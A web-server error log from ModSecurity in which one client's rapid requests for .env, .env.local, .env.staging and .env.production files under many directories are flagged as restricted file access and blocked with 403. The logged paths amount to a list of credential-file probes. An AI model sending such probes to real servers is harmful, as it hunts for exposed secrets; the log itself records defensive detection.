[Sat Mar 21 04:10:13.198191 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.staging"] [unique_id "ab4MFRsiL8ED2XitCKA8OwAAAAI"]
[Sat Mar 21 04:10:13.198361 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.staging"] [unique_id "ab4MFRsiL8ED2XitCKA8OwAAAAI"]
[Sat Mar 21 04:10:13.198519 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.staging"] [unique_id "ab4MFRsiL8ED2XitCKA8OwAAAAI"]
[Sat Mar 21 04:10:13.493938 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.local"] [unique_id "ab4MFRsiL8ED2XitCKA8PAAAAAI"]
[Sat Mar 21 04:10:13.494167 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.local"] [unique_id "ab4MFRsiL8ED2XitCKA8PAAAAAI"]
[Sat Mar 21 04:10:13.494400 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.local"] [unique_id "ab4MFRsiL8ED2XitCKA8PAAAAAI"]
[Sat Mar 21 04:10:13.788269 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.staging"] [unique_id "ab4MFRsiL8ED2XitCKA8PQAAAAI"]
[Sat Mar 21 04:10:13.788429 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.staging"] [unique_id "ab4MFRsiL8ED2XitCKA8PQAAAAI"]
[Sat Mar 21 04:10:13.788570 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.staging"] [unique_id "ab4MFRsiL8ED2XitCKA8PQAAAAI"]
[Sat Mar 21 04:10:14.082749 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.production"] [unique_id "ab4MFhsiL8ED2XitCKA8PgAAAAI"]
[Sat Mar 21 04:10:14.082903 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.production"] [unique_id "ab4MFhsiL8ED2XitCKA8PgAAAAI"]
[Sat Mar 21 04:10:14.083069 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.production"] [unique_id "ab4MFhsiL8ED2XitCKA8PgAAAAI"]
[Sat Mar 21 04:10:14.377475 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /develop/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.production"] [unique_id "ab4MFhsiL8ED2XitCKA8PwAAAAI"]
[Sat Mar 21 04:10:14.377706 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.production"] [unique_id "ab4MFhsiL8ED2XitCKA8PwAAAAI"]
[Sat Mar 21 04:10:14.377903 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.production"] [unique_id "ab4MFhsiL8ED2XitCKA8PwAAAAI"]
[Sat Mar 21 04:10:14.672017 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/API/.env"] [unique_id "ab4MFhsiL8ED2XitCKA8QAAAAAI"]
[Sat Mar 21 04:10:14.672175 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/API/.env"] [unique_id "ab4MFhsiL8ED2XitCKA8QAAAAAI"]
[Sat Mar 21 04:10:14.672321 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/API/.env"] [unique_id "ab4MFhsiL8ED2XitCKA8QAAAAAI"]
[Sat Mar 21 04:10:14.966582 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.production"] [unique_id "ab4MFhsiL8ED2XitCKA8QQAAAAI"]
[Sat Mar 21 04:10:14.966738 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.production"] [unique_id "ab4MFhsiL8ED2XitCKA8QQAAAAI"]
[Sat Mar 21 04:10:14.966897 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.production"] [unique_id "ab4MFhsiL8ED2XitCKA8QQAAAAI"]
[Sat Mar 21 04:10:15.262137 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.production"] [unique_id "ab4MFxsiL8ED2XitCKA8QgAAAAI"]
[Sat Mar 21 04:10:15.262292 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.production"] [unique_id "ab4MFxsiL8ED2XitCKA8QgAAAAI"]
[Sat Mar 21 04:10:15.262503 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.production"] [unique_id "ab4MFxsiL8ED2XitCKA8QgAAAAI"]
[Sat Mar 21 04:10:15.556627 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /develop/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.local"] [unique_id "ab4MFxsiL8ED2XitCKA8QwAAAAI"]
[Sat Mar 21 04:10:15.556793 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.local"] [unique_id "ab4MFxsiL8ED2XitCKA8QwAAAAI"]
[Sat Mar 21 04:10:15.556941 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.local"] [unique_id "ab4MFxsiL8ED2XitCKA8QwAAAAI"]
[Sat Mar 21 04:10:15.851034 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.production"] [unique_id "ab4MFxsiL8ED2XitCKA8RAAAAAI"]
[Sat Mar 21 04:10:15.851196 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.production"] [unique_id "ab4MFxsiL8ED2XitCKA8RAAAAAI"]
[Sat Mar 21 04:10:15.851335 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.production"] [unique_id "ab4MFxsiL8ED2XitCKA8RAAAAAI"]
[Sat Mar 21 04:10:16.146110 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.local"] [unique_id "ab4MGBsiL8ED2XitCKA8RQAAAAI"]
[Sat Mar 21 04:10:16.146267 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.local"] [unique_id "ab4MGBsiL8ED2XitCKA8RQAAAAI"]
[Sat Mar 21 04:10:16.146436 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.local"] [unique_id "ab4MGBsiL8ED2XitCKA8RQAAAAI"]
[Sat Mar 21 04:10:16.440608 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/back/.env"] [unique_id "ab4MGBsiL8ED2XitCKA8RgAAAAI"]
[Sat Mar 21 04:10:16.440804 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/back/.env"] [unique_id "ab4MGBsiL8ED2XitCKA8RgAAAAI"]
[Sat Mar 21 04:10:16.441410 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/back/.env"] [unique_id "ab4MGBsiL8ED2XitCKA8RgAAAAI"]
[Sat Mar 21 04:10:16.735698 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env"] [unique_id "ab4MGBsiL8ED2XitCKA8RwAAAAI"]
[Sat Mar 21 04:10:16.735865 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env"] [unique_id "ab4MGBsiL8ED2XitCKA8RwAAAAI"]
[Sat Mar 21 04:10:16.736024 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env"] [unique_id "ab4MGBsiL8ED2XitCKA8RwAAAAI"]
[Sat Mar 21 04:10:17.030189 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.staging"] [unique_id "ab4MGRsiL8ED2XitCKA8SAAAAAI"]
